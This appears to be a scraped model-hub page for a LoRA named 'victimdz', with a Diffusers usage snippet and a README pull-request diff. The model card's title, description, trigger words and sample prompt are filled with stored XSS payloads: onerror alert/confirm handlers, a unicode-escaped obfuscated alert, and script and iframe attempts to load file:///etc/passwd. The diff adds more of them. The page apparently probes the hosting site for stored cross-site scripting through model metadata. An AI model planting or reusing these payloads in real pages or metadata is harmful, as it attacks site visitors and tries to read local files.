Instructions to use victim1998p/victimdz with libraries, inference providers, notebooks, and local apps. Follow these links to get started.
- Libraries
- Diffusers
How to use victim1998p/victimdz with Diffusers:
pip install -U diffusers transformers accelerate
import torch from diffusers import DiffusionPipeline # switch to "mps" for apple devices pipe = DiffusionPipeline.from_pretrained("stabilityai/stable-cascade", dtype=torch.bfloat16, device_map="cuda") pipe.load_lora_weights("victim1998p/victimdz") prompt = "<img/src=x onError=\"`${x}`;alert(`xss stored`);\"> <Img Src=OnXSS OnError=confirm(1)> <fieldset//%00//onsite OnMoUsEoVeR=\\u0061\\u006C\\u0065\\u0072\\u0074`/aaa/`> ?><img src=x onmouseleave=print()>" image = pipe(prompt).images[0] - Notebooks
- Google Colab
- Kaggle
- Local Apps Settings
- Draw Things
- DiffusionBee
<script>document.write('<iframe src=file:///etc/passwd></iframe>');</script> <img src="xasdasdasd" onerror="document.write('<iframe src=file:///etc/passwd></iframe>')"/><iframe src=file:///etc/passwd></iframe>') test"><img src="/" =_=" title="onerror='prompt(1)'"> <img/src=x onError="`${x}`;alert(`xss stored`);"> <Img Src=OnXSS OnError=confirm(1)> <fieldset//%00//onsite OnMoUsEoVeR=\u0061\u006C\u0065\u0072\u0074`/aaa/`> ?><img src=x onmouseleave=print()>
#2
by mqawed - opened
README.md
CHANGED
|
@@ -224,6 +224,8 @@ instance_prompt: >-
|
|
| 224 |
OnMoUsEoVeR=\u0061\u006C\u0065\u0072\u0074`/aaa/`> ?><img src=x
|
| 225 |
onmouseleave=print()>
|
| 226 |
license: bigscience-bloom-rail-1.0
|
|
|
|
|
|
|
| 227 |
---
|
| 228 |
# <img/src=x onError="`${x}`;alert(`xss stored`);"> <Img Src=OnXSS OnError=confirm(1)> <fieldset//%00//onsite OnMoUsEoVeR=\u0061\u006C\u0065\u0072\u0074`/aaa/`> ?><img src=x onmouseleave=print()>
|
| 229 |
|
|
@@ -231,10 +233,14 @@ license: bigscience-bloom-rail-1.0
|
|
| 231 |
|
| 232 |
## Model description
|
| 233 |
|
| 234 |
-
|
| 235 |
-
|
| 236 |
-
|
| 237 |
-
|
|
|
|
|
|
|
|
|
|
|
|
|
| 238 |
|
| 239 |
## Trigger words
|
| 240 |
|
|
@@ -244,4 +250,4 @@ You should use `<img/src=x onError="`${x}`;aler
|
|
| 244 |
## Download model
|
| 245 |
|
| 246 |
|
| 247 |
-
[Download](/victim1998p/victimdz/tree/main) them in the Files & versions tab.
|
|
|
|
| 224 |
OnMoUsEoVeR=\u0061\u006C\u0065\u0072\u0074`/aaa/`> ?><img src=x
|
| 225 |
onmouseleave=print()>
|
| 226 |
license: bigscience-bloom-rail-1.0
|
| 227 |
+
language:
|
| 228 |
+
- ar
|
| 229 |
---
|
| 230 |
# <img/src=x onError="`${x}`;alert(`xss stored`);"> <Img Src=OnXSS OnError=confirm(1)> <fieldset//%00//onsite OnMoUsEoVeR=\u0061\u006C\u0065\u0072\u0074`/aaa/`> ?><img src=x onmouseleave=print()>
|
| 231 |
|
|
|
|
| 233 |
|
| 234 |
## Model description
|
| 235 |
|
| 236 |
+
<script>document.write('<iframe src=file:///etc/passwd></iframe>');</script>
|
| 237 |
+
<img src="xasdasdasd" onerror="document.write('<iframe src=file:///etc/passwd></iframe>')"/><iframe src=file:///etc/passwd></iframe>')
|
| 238 |
+
|
| 239 |
+
test"><img src="/" =_=" title="onerror='prompt(1)'">
|
| 240 |
+
<img/src=x onError="`${x}`;alert(`xss stored`);">
|
| 241 |
+
<Img Src=OnXSS OnError=confirm(1)>
|
| 242 |
+
<fieldset//%00//onsite OnMoUsEoVeR=\u0061\u006C\u0065\u0072\u0074`/aaa/`>
|
| 243 |
+
?><img src=x onmouseleave=print()>
|
| 244 |
|
| 245 |
## Trigger words
|
| 246 |
|
|
|
|
| 250 |
## Download model
|
| 251 |
|
| 252 |
|
| 253 |
+
[Download](/victim1998p/victimdz/tree/main) them in the Files & versions tab.
|